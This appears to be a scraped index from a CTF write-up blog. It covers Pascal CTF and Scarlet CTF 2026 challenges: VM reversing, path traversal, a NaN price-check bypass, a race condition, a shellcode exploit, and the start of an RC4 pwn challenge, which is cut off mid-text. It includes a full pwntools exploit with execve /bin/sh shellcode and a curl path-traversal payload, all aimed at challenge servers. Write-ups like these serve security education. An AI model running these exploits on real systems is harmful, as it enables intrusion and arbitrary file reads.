2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/pdfile/","section":"CTFs","summary":"XXE injection with blacklist bypass via URL encoding.","title":"Pdfile","type":"ctfs"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/topics/rev/","section":"Topics","summary":"Reverse 
engineering challenges and program analysis.","title":"Rev","type":"topics"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/rust/","section":"Tags","summary":"","title":"Rust","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/serde/","section":"Tags","summary":"","title":"Serde","type":"tags"},{"content":"A stranger once built a VM and hid the Forbidden Key, can you uncover it?\nWe get a VM binary and a bytecode file code.pascal. Running it asks for input and either accepts or rejects.\nFinding the VM loop # Opening the binary reveals a simple fetch-decode-execute loop:\nwhile (1) { opcode = bytecode[pc]; pc++; switch (opcode) { case 0: // HALT return; case 1: // ADD addr = *(uint32_t*)\u0026amp;bytecode[pc]; imm = bytecode[pc + 4]; pc += 5; mem[addr] = (mem[addr] + imm) \u0026amp; 0xFF; break; case 2: // SUB addr = *(uint32_t*)\u0026amp;bytecode[pc]; imm = bytecode[pc + 4]; pc += 5; mem[addr] = (mem[addr] - imm) \u0026amp; 0xFF; break; case 3: // MOD addr = *(uint32_t*)\u0026amp;bytecode[pc]; imm = bytecode[pc + 4]; pc += 5; mem[addr] = mem[addr] % imm; break; case 4: // MOV addr = *(uint32_t*)\u0026amp;bytecode[pc]; imm = bytecode[pc + 4]; pc += 5; mem[addr] = imm; break; case 5: // IN (read char) addr = *(uint32_t*)\u0026amp;bytecode[pc]; pc += 4; mem[addr] = getchar(); break; case 6: // JZ (jump if zero) addr = *(uint32_t*)\u0026amp;bytecode[pc]; offset = (int8_t)bytecode[pc + 4]; // signed! 
pc += 5; if (mem[addr] == 0) pc += offset; break; } } Opcode Mnemonic Encoding Description 0x00 HALT 00 Stop execution 0x01 ADD 01 \u0026lt;addr:4\u0026gt; \u0026lt;imm:1\u0026gt; mem[addr] += imm 0x02 SUB 02 \u0026lt;addr:4\u0026gt; \u0026lt;imm:1\u0026gt; mem[addr] -= imm 0x03 MOD 03 \u0026lt;addr:4\u0026gt; \u0026lt;imm:1\u0026gt; mem[addr] %= imm 0x04 MOV 04 \u0026lt;addr:4\u0026gt; \u0026lt;imm:1\u0026gt; mem[addr] = imm 0x05 IN 05 \u0026lt;addr:4\u0026gt; mem[addr] = getchar() 0x06 JZ 06 \u0026lt;addr:4\u0026gt; \u0026lt;off:1\u0026gt; Jump if mem[addr] == 0 Writing a disassembler # import struct def disassemble(bytecode): pc = 0 while pc \u0026lt; len(bytecode): opcode = bytecode[pc] if opcode == 0: print(f\u0026#34;{pc:04x}: HALT\u0026#34;) break elif opcode in [1, 2, 3, 4]: names = {1: \u0026#34;ADD\u0026#34;, 2: \u0026#34;SUB\u0026#34;, 3: \u0026#34;MOD\u0026#34;, 4: \u0026#34;MOV\u0026#34;} addr = struct.unpack(\u0026#39;\u0026lt;I\u0026#39;, bytecode[pc+1:pc+5])[0] imm = bytecode[pc+5] print(f\u0026#34;{pc:04x}: {names[opcode]} mem[{addr}], {imm}\u0026#34;) pc += 6 elif opcode == 5: addr = struct.unpack(\u0026#39;\u0026lt;I\u0026#39;, bytecode[pc+1:pc+5])[0] print(f\u0026#34;{pc:04x}: IN mem[{addr}]\u0026#34;) pc += 5 elif opcode == 6: addr = struct.unpack(\u0026#39;\u0026lt;I\u0026#39;, bytecode[pc+1:pc+5])[0] offset = bytecode[pc+5] if offset \u0026gt; 127: offset -= 256 # sign extend target = pc + 6 + offset print(f\u0026#34;{pc:04x}: JZ mem[{addr}], {offset:+d} -\u0026gt; {target:04x}\u0026#34;) pc += 6 with open(\u0026#34;code.pascal\u0026#34;, \u0026#34;rb\u0026#34;) as f: disassemble(f.read()) Analyzing the bytecode # The disassembled output shows a repeating pattern for each input character:\n0000: IN mem[0] ; read char 0 0005: MOV mem[1], 0 ; temp = 0 000b: MOD mem[1], 2 ; temp = 0 % 2 = 0 0011: JZ mem[1], +12 ; if temp == 0, jump to ADD 0017: SUB mem[0], 0 ; (skipped) char -= 0 001d: JZ mem[1023], +6 ; unconditional jump (mem[1023] is always 
0) 0023: ADD mem[0], 0 ; char += 0 0029: IN mem[1] ; read char 1 002e: MOV mem[2], 1 ; temp = 1 0034: MOD mem[2], 2 ; temp = 1 % 2 = 1 003a: JZ mem[2], +12 ; if temp == 0 (false), continue 0040: SUB mem[1], 1 ; char -= 1 0046: JZ mem[1023], +6 ; unconditional jump past ADD 004c: ADD mem[1], 1 ; (skipped) 0052: IN mem[2] ; read char 2 0057: MOV mem[3], 2 ; temp = 2 005d: MOD mem[3], 2 ; temp = 2 % 2 = 0 0063: JZ mem[3], +12 ; if temp == 0, jump to ADD 0069: SUB mem[2], 2 ; (skipped) 006f: JZ mem[1023], +6 ; unconditional jump 0075: ADD mem[2], 2 ; char += 2 ... The pattern:\nRead character into mem[i] Check if index i is odd or even via i % 2 If even: mem[i] += i If odd: mem[i] -= i The JZ mem[1023] is a clever unconditional jump. Since mem[1023] is never written, it stays 0, so the jump always triggers.\nFinding the target values # After the bytecode finishes, main compares the result:\nif (strcmp(mem, flag)) puts(\u0026#34;Execution failed. The code did not match the expected flag.\u0026#34;); else puts(\u0026#34;Congratulations! 
You have successfully executed the code.\u0026#34;); Where flag points to:\nchar flag[0x29] = \u0026#34;VLu\\\\8m9Xl(\u0026gt;W{_?TD[q \\x82\\x1b\\x8bP\\x80F~\\x15\\x8aW}ZPT\\x81Q\\x8c\\x0c\\x94D\u0026#34;; The target bytes are right there in the binary.\nSolving # Reverse the transformation:\ntarget = bytes([ 0x56, 0x4C, 0x75, 0x5C, 0x38, 0x6D, 0x39, 0x58, 0x6C, 0x28, 0x3E, 0x57, 0x7B, 0x5F, 0x3F, 0x54, 0x44, 0x5B, 0x71, 0x20, 0x82, 0x1B, 0x8B, 0x50, 0x80, 0x46, 0x7E, 0x15, 0x8A, 0x57, 0x7D, 0x5A, 0x50, 0x54, 0x81, 0x51, 0x8C, 0x0C, 0x94, 0x44 ]) flag = bytearray() for i, b in enumerate(target): if i % 2 == 0: flag.append((b - i) \u0026amp; 0xFF) # reverse of +i else: flag.append((b + i) \u0026amp; 0xFF) # reverse of -i print(flag.decode()) Flag # pascalCTF{VMs_4r3_d14bol1c4l_3n0ugh_d0nt_y0u_th1nk} ","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/strangevm/","section":"CTFs","summary":"Reverse a simple VM to understand its character transformation.","title":"StrangeVM","type":"ctfs"},{"content":"Nel mezzo del cammin di nostra vita mi ritrovai per una selva oscura, ché la diritta via era smarrita.\nThe flag can be found here /app/flag.txt\nThe challenge presents a \u0026ldquo;Travel Playlist\u0026rdquo; website with a gallery of travel-themed songs. You can navigate between pages 1-7, each showing a different song with a YouTube link.\nNo source code was provided, so we need to figure out how the site works.\nA false lead # The URL structure shows a number: https://travel.ctf.pascalctf.it/pages/4. Normally, a number in a URL like this would make you think of IDOR (Insecure Direct Object Reference), not path traversal. But when the challenge description is practically screaming \u0026ldquo;path traversal\u0026rdquo; with the Dante quote, your brain might jump to trying LFI here first:\nhttps://travel.ctf.pascalctf.it/pages/../../../etc/passwd This doesn\u0026rsquo;t work. 
The /pages/4 route is handled by a framework that maps it to a function, not directly to files. The lesson: even when you\u0026rsquo;re pretty sure what vulnerability you\u0026rsquo;re looking for, don\u0026rsquo;t get tunnel vision on the first input you see. Check all the places where user input flows into the application.\nDiscovering the API # When you click around a website, your browser makes requests behind the scenes. To see what\u0026rsquo;s happening, you can use:\nBrowser DevTools (easiest)\nOpen the site in your browser Press F12 or right-click and select \u0026ldquo;Inspect\u0026rdquo; Go to the \u0026ldquo;Network\u0026rdquo; tab Click around the site and watch requests appear Look for API calls (often to /api/... endpoints) Burp Suite (more powerful)\nConfigure your browser to proxy through Burp Browse the site normally Burp captures every request for inspection and modification Using either method, we can see that when navigating to a page, the site makes a POST request:\nPOST /api/get_json Content-Type: application/json {\u0026#34;index\u0026#34;: \u0026#34;1\u0026#34;} And receives back:\n{ \u0026#34;name\u0026#34;: \u0026#34;Red Hot Chili Peppers - Road Trippin\u0026#39;\u0026#34;, \u0026#34;author\u0026#34;: \u0026#34;Red Hot Chili Peppers\u0026#34;, \u0026#34;description\u0026#34;: \u0026#34;Watch the official music video...\u0026#34;, \u0026#34;url\u0026#34;: \u0026#34;https://youtu.be/11GYvfYjyV0\u0026#34; } The index parameter controls which song data gets loaded. But how does the server use this parameter?\nWhat is path traversal? # The server is probably reading files like /app/data/1.json, /app/data/2.json, etc. If the code looks something like:\ndef get_json(): index = request.json[\u0026#39;index\u0026#39;] path = f\u0026#34;/app/data/{index}.json\u0026#34; return open(path).read() Then the index value gets inserted directly into the file path. This is dangerous because we can use .. 
(dot-dot) to navigate up directories.\nIn file systems, .. means \u0026ldquo;parent directory\u0026rdquo;. So:\n/app/data/1.json reads the normal file /app/data/../flag.txt goes up from data/ to /app/, then reads flag.txt This technique is called path traversal or directory traversal. It lets attackers escape the intended directory and read arbitrary files.\nThe hint # The challenge description quotes Dante\u0026rsquo;s Inferno:\nNel mezzo del cammin di nostra vita mi ritrovai per una selva oscura, ché la diritta via era smarrita.\nTranslation:\n\u0026ldquo;In the middle of the journey of our life, I found myself in a dark forest, for the straight path was lost.\u0026rdquo;\nThe key phrase is \u0026ldquo;la diritta via era smarrita\u0026rdquo;, meaning \u0026ldquo;the straight/direct path was lost.\u0026rdquo; This hints at path traversal: instead of following the intended path (/app/data/1.json), we stray off course using ../ to wander elsewhere in the filesystem.\nExploit # The challenge tells us the flag is at /app/flag.txt. Since the API probably reads from /app/data/{index}.json, we need to go up one directory:\ncurl -s \u0026#34;https://travel.ctf.pascalctf.it/api/get_json\u0026#34; \\ -X POST \\ -H \u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;index\u0026#34;: \u0026#34;../flag.txt\u0026#34;}\u0026#39; The server constructs the path /app/data/../flag.txt, which resolves to /app/flag.txt, and returns its contents.\nNote: the .json extension might still get appended, but many path traversal vulnerabilities work anyway if the file system ignores the extension or if there\u0026rsquo;s a null byte trick. 
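The resolution step is easy to convince yourself of locally. A quick illustration (my addition, using the stdlib posixpath.normpath to collapse the .. components the same way the server's filesystem would; the .json suffix, if appended, is left out for clarity):

```python
import posixpath

# Attacker-controlled index value from the POST body in this challenge:
index = '../flag.txt'

# The server presumably prefixes its data directory; the '..' then
# walks back up out of /app/data before the file is opened.
resolved = posixpath.normpath('/app/data/' + index)
assert resolved == '/app/flag.txt'
print(resolved)
```

The single ../ suffices here because the flag sits one level above the data directory; deeper layouts just need more ../ segments.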
In this case, it seems the server either doesn\u0026rsquo;t append an extension or the traversal bypasses it.\nFlag # pascalCTF{4ll_1_d0_1s_tr4v3ll1nG_4r0und_th3_w0rld} ","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/travel-playlist/","section":"CTFs","summary":"Path traversal via unsanitized file path parameter.","title":"Travel Playlist","type":"ctfs"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/vm/","section":"Tags","summary":"","title":"Vm","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/xml/","section":"Tags","summary":"","title":"Xml","type":"tags"},{"content":"","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/tags/xxe/","section":"Tags","summary":"","title":"Xxe","type":"tags"},{"content":"We dont take any responsibility in any damage that our product may cause to the user\u0026rsquo;s health\nA shop where you can buy various \u0026ldquo;Za\u0026rdquo; products. You start with $100 balance, but the flag item \u0026ldquo;RealZa\u0026rdquo; costs $1000.\nThe vulnerability # Looking at the checkout logic in server.js:\nconst prices = { \u0026#34;FakeZa\u0026#34;: 1, \u0026#34;ElectricZa\u0026#34;: 65, \u0026#34;CartoonZa\u0026#34;: 35, \u0026#34;RealZa\u0026#34;: 1000 }; app.post(\u0026#39;/checkout\u0026#39;, (req, res) =\u0026gt; { const cart = req.session.cart; let total = 0; for (const product in cart) { total += prices[product] * cart[product]; } if (total \u0026gt; req.session.balance) { res.json({ \u0026#34;success\u0026#34;: true, \u0026#34;balance\u0026#34;: \u0026#34;Insufficient Balance\u0026#34; }); } else { // Purchase succeeds, items added to inventory // ... } }); The problem: the cart can contain any product name, not just valid ones. 
If product doesn\u0026rsquo;t exist in prices:\nprices[\u0026#34;RealZa\u0026#34;] * 1 // 1000 prices[\u0026#34;anything\u0026#34;] * 1 // undefined * 1 = NaN 1000 + NaN // NaN NaN \u0026gt; 100 // false Since NaN \u0026gt; 100 is false, the balance check passes.\nExploit # Using Burp Suite:\nLogin - POST to /login with any username/password\nAdd RealZa to cart - POST to /add-cart:\n{\u0026#34;product\u0026#34;:\u0026#34;RealZa\u0026#34;,\u0026#34;quantity\u0026#34;:1} Add a fake product - POST to /add-cart:\n{\u0026#34;product\u0026#34;:\u0026#34;anything\u0026#34;,\u0026#34;quantity\u0026#34;:1} Checkout - POST to /checkout\nGet flag - Visit /inventory\nThe fake product causes prices[\u0026quot;anything\u0026quot;] to be undefined, making the total NaN. The check NaN \u0026gt; 100 returns false, so checkout succeeds despite not having enough balance.\nFlag # pascalCTF{w3_l1v3_f0r_th3_z4z4} ","date":"31 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/pascal-26/zazastore/","section":"CTFs","summary":"NaN comparison bypass in a Node.js shopping cart.","title":"Zazastore","type":"ctfs"},{"content":"","date":"25 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/scarlet-26/","section":"CTFs","summary":"","title":"Scarlet CTF 2026","type":"ctfs"},{"content":"","date":"10 January 2026","externalUrl":null,"permalink":"/writeups/tags/function-pointer/","section":"Tags","summary":"","title":"Function-Pointer","type":"tags"},{"content":"","date":"10 January 2026","externalUrl":null,"permalink":"/writeups/tags/input-buffering/","section":"Tags","summary":"","title":"Input-Buffering","type":"tags"},{"content":"","date":"10 January 2026","externalUrl":null,"permalink":"/writeups/tags/race-condition/","section":"Tags","summary":"","title":"Race-Condition","type":"tags"},{"content":"Take a look at this super l33t login system I made for my Computer Architecture class! Heh\u0026hellip;my prof is gonna be so proud. 
He\u0026rsquo;s 100% gonna boost my GPA.\nSurely this will be safe to push to prod. I\u0026rsquo;ll even do it for him!\nnc challs.ctf.rusec.club 4622 The challenge provides a university login system with role-based access control. Users authenticate via randomly generated RUIDs (Rutgers University IDs), and different roles grant different privileges.\nBinary protections # Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX unknown - GNU_STACK missing PIE: PIE enabled Stack: Executable RWX: Has RWX segments The binary has most standard protections enabled, but critically, the stack is executable. This immediately suggests a shellcode-based exploitation path.\nReverse engineering # User structure and initialization # The binary defines a user structure that stores names, RUIDs, and function pointers:\nstruct user { char name[32]; uint64_t fn; // function pointer uint64_t ruid; // random user ID }; During initialization, two privileged users are created:\nint64_t setup_users() { char const* names[2]; names[0] = \u0026amp;titles.prof; names[1] = \u0026amp;titles.dean; int64_t (* handlers[2])(); handlers[0] = prof; handlers[1] = dean; for (int32_t i = 0; i \u0026lt;= 1; i += 1) { strcpy(\u0026amp;users[i], (\u0026amp;names)[i], \u0026amp;users); users[i].ruid = rand(); // predictable PRNG users[i].fn = handlers[i]; } } The RUIDs are generated using rand() without seeding, making them completely predictable across runs.\nAuthentication flow # The main loop prompts for a RUID and calls the corresponding user\u0026rsquo;s function pointer if a match is found:\nprintf(\u0026#34;Please enter your RUID: \u0026#34;); uint64_t ruid; scanf(\u0026#34;%lu%*c\u0026#34;, \u0026amp;ruid); for (int32_t i = 0; i \u0026lt;= 1; i += 1) { if (users[i].ruid == ruid) { printf(\u0026#34;Welcome, %s!\\n\u0026#34;, \u0026amp;users[i]); users[i].fn(); // call function pointer match = 1; } } This design allows us to trigger arbitrary function pointers by authenticating as 
different users.\nVulnerability: dean() overflow # The dean() function allows modifying staff member names but contains a critical buffer overflow:\nint64_t dean() { puts(\u0026#34;Change a staff member\u0026#39;s name!\u0026#34;); list_ruids(); int32_t user_idx; if (get_number(\u0026amp;user_idx, 2)) { printf(\u0026#34;New name: \u0026#34;); read(0, \u0026amp;users[user_idx], 0x29); // writes 41 bytes into 32-byte name } } The read() call accepts 41 bytes into a 32-byte buffer, allowing us to overflow into the function pointer (8 bytes) and partially into the RUID (1 byte).\nShellcode injection point # Early in main(), the program reads a NetID into a stack buffer:\nchar net_id[0x40]; read(0, \u0026amp;net_id, 0x40); Since the stack is executable, this becomes our shellcode injection point.\nExploitation strategy # The attack proceeds in five steps:\nPredict RUIDs - Calculate the deterministic rand() values Inject shellcode - Place shellcode on the stack via the NetID prompt Leak PIE base - Overflow to leak a code pointer Leak stack address - Redirect execution to leak a stack pointer Hijack control flow - Point function pointer to shellcode Predicting RUIDs # Since rand() is unseeded, we can predict the values locally:\nfrom ctypes import CDLL libc = CDLL(\u0026#34;libc.so.6\u0026#34;) prof_ruid = libc.rand() # first rand() -\u0026gt; Professor dean_ruid = libc.rand() # second rand() -\u0026gt; Dean These values remain constant across all executions of the binary.\nStage 1: Shellcode injection # We inject execve shellcode at the NetID prompt:\nshellcode = asm( \u0026#34;\u0026#34;\u0026#34; xor esi, esi xor edx, edx xor eax, eax push rax mov rdi, 0x68732f2f6e69622f push rdi mov rdi, rsp mov al, 59 syscall \u0026#34;\u0026#34;\u0026#34; ) p.sendlineafter(b\u0026#34;Please enter your netID:\u0026#34;, shellcode) This shellcode executes /bin/sh and will be our final target.\nStage 2: PIE leak # We authenticate as the Dean and overflow the Professor\u0026rsquo;s 
name field:\np.sendlineafter(b\u0026#34;Please enter your RUID:\u0026#34;, str(dean_ruid).encode()) p.sendlineafter(b\u0026#34;Num:\u0026#34;, b\u0026#34;0\u0026#34;) p.sendafter(b\u0026#34;New name:\u0026#34;, b\u0026#34;A\u0026#34; * 32) By writing exactly 32 bytes, we force the function pointer to be printed alongside the name, leaking a code address.\np.recvuntil(b\u0026#34;[0] {RUID REDACTED} \u0026#34;) leak = struct.unpack(\u0026#34;\u0026lt;Q\u0026#34;, p.recvline(keepends=False)[32:].ljust(8, b\u0026#34;\\0\u0026#34;))[0] bin.address = leak - 0x12f3 Stage 3: Stack leak # We overwrite the Professor\u0026rsquo;s function pointer with puts@plt:\np.sendlineafter(b\u0026#34;RUID:\u0026#34;, str(dean_ruid).encode()) p.sendlineafter(b\u0026#34;Num:\u0026#34;, b\u0026#34;0\u0026#34;) p.sendafter(b\u0026#34;New name:\u0026#34;, b\u0026#34;A\u0026#34; * 32 + p64(bin.plt[\u0026#34;puts\u0026#34;])) When we authenticate as the Professor, instead of calling the intended handler, puts() is invoked with the user structure\u0026rsquo;s address, leaking a stack pointer:\np.sendlineafter(b\u0026#34;your RUID:\u0026#34;, str(prof_ruid).encode()) p.recvuntil(b\u0026#34;Welcome\u0026#34;) p.recvline() stack_leak = struct.unpack(\u0026#34;\u0026lt;Q\u0026#34;, p.recvline(keepends=False).ljust(8, b\u0026#34;\\0\u0026#34;))[0] shell_addr = stack_leak + 0x1c0 # calculate shellcode location Stage 4: Shellcode execution # Finally, we overwrite the Professor\u0026rsquo;s function pointer to point to our shellcode:\np.sendlineafter(b\u0026#34;RUID:\u0026#34;, str(dean_ruid).encode()) p.sendlineafter(b\u0026#34;Num:\u0026#34;, b\u0026#34;0\u0026#34;) p.sendafter(b\u0026#34;New name:\u0026#34;, b\u0026#34;A\u0026#34; * 32 + p64(shell_addr)) Authenticating as the Professor now triggers our shellcode:\np.sendlineafter(b\u0026#34;RUID:\u0026#34;, str(prof_ruid).encode()) p.interactive() Final exploit # from ctypes import CDLL from pwn import * context.binary = bin = 
ELF(\u0026#34;./ruid_login\u0026#34;, checksec=False) libc = CDLL(\u0026#34;libc.so.6\u0026#34;) prof_ruid = libc.rand() dean_ruid = libc.rand() shellcode = asm( \u0026#34;\u0026#34;\u0026#34; xor esi, esi xor edx, edx xor eax, eax push rax mov rdi, 0x68732f2f6e69622f push rdi mov rdi, rsp mov al, 59 syscall \u0026#34;\u0026#34;\u0026#34; ) p = remote(\u0026#34;challs.ctf.rusec.club\u0026#34;, 4622) # Stage 1: Inject shellcode p.sendlineafter(b\u0026#34;Please enter your netID:\u0026#34;, shellcode) # Stage 2: Leak PIE base p.sendlineafter(b\u0026#34;Please enter your RUID:\u0026#34;, str(dean_ruid).encode()) p.sendlineafter(b\u0026#34;Num:\u0026#34;, b\u0026#34;0\u0026#34;) p.sendafter(b\u0026#34;New name:\u0026#34;, b\u0026#34;A\u0026#34; * 32) p.recvuntil(b\u0026#34;[0] {RUID REDACTED} \u0026#34;) leak = struct.unpack(\u0026#34;\u0026lt;Q\u0026#34;, p.recvline(keepends=False)[32:].ljust(8, b\u0026#34;\\0\u0026#34;))[0] bin.address = leak - 0x12f3 # Stage 3: Leak stack address p.sendlineafter(b\u0026#34;RUID:\u0026#34;, str(dean_ruid).encode()) p.sendlineafter(b\u0026#34;Num:\u0026#34;, b\u0026#34;0\u0026#34;) p.sendafter(b\u0026#34;New name:\u0026#34;, b\u0026#34;A\u0026#34; * 32 + p64(bin.plt[\u0026#34;puts\u0026#34;])) p.sendlineafter(b\u0026#34;your RUID:\u0026#34;, str(prof_ruid).encode()) p.recvuntil(b\u0026#34;Welcome\u0026#34;) p.recvline() stack_leak = struct.unpack(\u0026#34;\u0026lt;Q\u0026#34;, p.recvline(keepends=False).ljust(8, b\u0026#34;\\0\u0026#34;))[0] shell_addr = stack_leak + 0x1c0 # Stage 4: Execute shellcode p.sendlineafter(b\u0026#34;RUID:\u0026#34;, str(dean_ruid).encode()) p.sendlineafter(b\u0026#34;Num:\u0026#34;, b\u0026#34;0\u0026#34;) p.sendafter(b\u0026#34;New name:\u0026#34;, b\u0026#34;A\u0026#34; * 32 + p64(shell_addr)) p.sendlineafter(b\u0026#34;RUID:\u0026#34;, str(prof_ruid).encode()) p.interactive() Flag # RUSEC{w0w_th4ts_such_a_l0ng_net1D_w4it_w4it_wh4ts_g0ing_0n_uh_0h} ","date":"10 January 
2026","externalUrl":null,"permalink":"/writeups/ctfs/scarlet-26/ruid_login/","section":"CTFs","summary":"Exploiting predictable RUIDs, buffer overflow, and executable stack for shellcode execution.","title":"Ruid_login","type":"ctfs"},{"content":"","date":"10 January 2026","externalUrl":null,"permalink":"/writeups/tags/shellcode/","section":"Tags","summary":"","title":"Shellcode","type":"tags"},{"content":"Its 2026, I need to start journal-maxing. Thats why I use speedjournal, which lets me brain-max my thoughts while time-maxing with the speed of C! Its also security-maxed so only I can read my private entries!\nnc challs.ctf.rusec.club 22169 This challenge presents a simple logging system where the flag is stored in a restricted log entry. Only authenticated admin users should be able to read restricted logs, but a timing vulnerability allows us to bypass this check.\nOverview # The program is a multi-threaded journal application with the following features:\nAdmin authentication with a password Writing new log entries (restricted or public) Reading log entries (with access control for restricted entries) A flag stored in a restricted log at index 0 1. Login admin 2. Write log 3. Read log 4. 
Exit Vulnerability analysis # The authentication mechanism # When you log in as admin, the system sets a global flag but immediately starts a background thread that resets it after a short delay:\nint is_admin = 0; // global authentication flag void *logout_thread(void *arg) { usleep(WAIT_TIME); // sleep for 1000 microseconds (1ms) is_admin = 0; // automatically log out return NULL; } void login_admin() { char pw[32]; printf(\u0026#34;Admin password: \u0026#34;); fgets(pw, sizeof(pw), stdin); if (strncmp(pw, \u0026#34;supersecret\\n\u0026#34;, 12) == 0) { is_admin = 1; // set admin flag pthread_t t; pthread_create(\u0026amp;t, NULL, logout_thread, NULL); pthread_detach(t); puts(\u0026#34;[+] Admin logged in (temporarily)\u0026#34;); } } The logout happens after only 1000 microseconds (1 millisecond). This seems like it would be too fast to exploit, but there\u0026rsquo;s a critical detail that makes this vulnerable.\nThe access control check # Reading a restricted log requires admin privileges:\nvoid read_log() { int idx; printf(\u0026#34;Index: \u0026#34;); scanf(\u0026#34;%d\u0026#34;, \u0026amp;idx); getchar(); if (idx \u0026lt; 0 || idx \u0026gt;= log_count) { puts(\u0026#34;Invalid index\u0026#34;); return; } if (logs[idx].restricted \u0026amp;\u0026amp; !is_admin) { // race condition here puts(\u0026#34;Access denied\u0026#34;); return; } printf(\u0026#34;Log: %s\\n\u0026#34;, logs[idx].content); } The vulnerability is a race condition between the main thread and the logout thread. While is_admin is set to 1, we have a narrow window to read the restricted log before the background thread resets it to 0.\nInput buffering: the key to exploitation # The critical insight is that scanf() and fgets() read from a buffered input stream. 
When you send multiple lines at once, they\u0026rsquo;re stored in the input buffer and processed sequentially without delay.\nThis means we can send our entire command sequence instantly:\n1 # Select \u0026#34;Login admin\u0026#34; supersecret # Enter password 3 # Select \u0026#34;Read log\u0026#34; 0 # Read index 0 (the flag) When these commands are all sent together, here\u0026rsquo;s what happens:\nThe program reads 1 from the buffer → calls login_admin() login_admin() reads supersecret\\n from the buffer → sets is_admin = 1 The logout thread is created but hasn\u0026rsquo;t executed yet Control returns to main, which reads 3 from the buffer → calls read_log() read_log() reads 0 from the buffer and checks is_admin → still 1! The flag is printed (Later) The logout thread finally executes Because all the input is pre-buffered, the entire sequence executes much faster than 1 millisecond. The program never has to wait for user input, so it completes before the logout thread can fire.\nExploitation # Method 1: Using pwntools # from pwn import * p = remote(\u0026#34;challs.ctf.rusec.club\u0026#34;, 22169) p.sendafter(b\u0026#34;\u0026gt; \u0026#34;, b\u0026#34;1\\nsupersecret\\n3\\n0\\n\u0026#34;) p.interactive() The sendafter() call waits for the prompt, then sends all four commands at once. They\u0026rsquo;re processed from the buffer faster than the thread can reset is_admin.\nMethod 2: Using netcat and printf # printf \u0026#34;1\\nsupersecret\\n3\\n0\\n\u0026#34; | nc challs.ctf.rusec.club 22169 This pipes all the input at once, achieving the same buffering effect.\nExecution trace # 1. Login admin 2. Write log 3. Read log 4. Exit \u0026gt; Admin password: [+] Admin logged in (temporarily) 1. Login admin 2. Write log 3. Read log 4. Exit \u0026gt; Index: Log: RUSEC{wow_i_did_a_data_race} 1. Login admin 2. Write log 3. Read log 4. Exit \u0026gt; Notice how all the prompts appear sequentially with no delay. 
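The whole interaction can be reduced to a toy Python model (a hypothetical sketch, not the challenge code): a daemon thread clears is_admin after a delay, while the pre-buffered commands are consumed back-to-back with no waiting in between.

```python
import threading
import time

is_admin = False
logs = {0: ("restricted", "RUSEC{wow_i_did_a_data_race}")}

def logout_later(delay):
    """Stand-in for the challenge's logout thread."""
    global is_admin
    time.sleep(delay)
    is_admin = False

def run(buffered, delay=0.2):
    """Consume pre-buffered commands back-to-back, as the real binary does."""
    global is_admin
    out = []
    cmds = iter(buffered)
    for cmd in cmds:
        if cmd == "1" and next(cmds) == "supersecret":  # login admin
            is_admin = True
            threading.Thread(target=logout_later, args=(delay,), daemon=True).start()
        elif cmd == "3":                                # read log
            kind, content = logs[int(next(cmds))]
            out.append("Access denied" if kind == "restricted" and not is_admin
                       else content)
    return out

print(run(["1", "supersecret", "3", "0"]))  # ['RUSEC{wow_i_did_a_data_race}']
```

With a generous 0.2 s logout delay standing in for the 1 ms usleep, the buffered read always lands inside the admin window; sleeping past the delay before reading yields Access denied instead.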
The entire sequence completes before the 1ms timer expires.\nWhy this works # The exploit succeeds because of three factors:\nInput buffering: Commands are read from a buffer, not interactively Fast execution: Reading from a buffer is much faster than 1ms Threading timing: The logout thread doesn\u0026rsquo;t preempt the main thread immediately Even though 1 millisecond seems very short, it\u0026rsquo;s an eternity in CPU time. A modern processor can execute millions of instructions in 1ms. Our buffered input is processed in microseconds.\nFlag # RUSEC{wow_i_did_a_data_race} ","date":"10 January 2026","externalUrl":null,"permalink":"/writeups/ctfs/scarlet-26/speedjournal/","section":"CTFs","summary":"Exploiting a TOCTOU race condition to bypass authentication checks.","title":"speedjournal","type":"ctfs"},{"content":"","date":"10 January 2026","externalUrl":null,"permalink":"/writeups/tags/threading/","section":"Tags","summary":"","title":"Threading","type":"tags"},{"content":"","date":"8 November 2025","externalUrl":null,"permalink":"/writeups/tags/bias/","section":"Tags","summary":"","title":"Bias","type":"tags"},{"content":" Grab your resident cryptographer and try our shiny new Encryption-As-A-Service!\nncat --ssl encryptor-pwn.ept.gg 1337 The challenge provides a single ELF binary, encryptor, which exposes a menu-driven encryption service. On startup, it helpfully leaks the address of a forbidden function.\nWelcome to the EPT encryptor! Please behave yourself, and remember to stay away from a certain function at 0x55da2f7324f0! 1. Encrypt a message 2. Reset the key and encrypt again 3. Change offset 4. 
Exit \u0026gt; Despite PIE being enabled, the address of win() is printed on startup, removing the need for a separate code pointer leak.\nBinary protections # All standard mitigations are enabled.\nArch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled Reverse engineering # Encryption logic # Menu option 1 allows the user to encrypt an arbitrary string.\nif (menu_choice == 1) { printf(\u0026#34;Enter string to encrypt\\n\u0026gt; \u0026#34;); fgets(local_108, 242, stdin); RC4(key, local_108 + local_18, local_1f8, local_108 + local_18); puts_hex(local_1f8); resetKey(); } Two issues immediately stand out:\nfgets() reads 242 bytes into a 240-byte buffer The RC4 input pointer is offset by a stack variable local_18 Relevant stack layout:\nuchar local_1f8[240]; // ciphertext char local_108[240]; // user input A full-length read therefore spills past local_108: the 241st input byte lands on the least significant byte of local_18, followed by the terminating null byte from fgets().\nDisabled offset control # There is a menu option intended to change this offset:\n\u0026gt; 3 Sorry, offset function disabled due to abuse! However, since local_18 is stored directly after the input buffer, the overflow allows us to modify its low byte anyway. This gives indirect control over where RC4 reads plaintext from on the stack.\nStack layout and target # The relevant portion of the stack frame looks like this:\n[ user input buffer ] 240 bytes [ offset variable ] 8 bytes (LSB controllable) [ padding ] [ stack canary ] 8 bytes [ saved rbp ] 8 bytes [ return address ] 8 bytes By adjusting the RC4 input 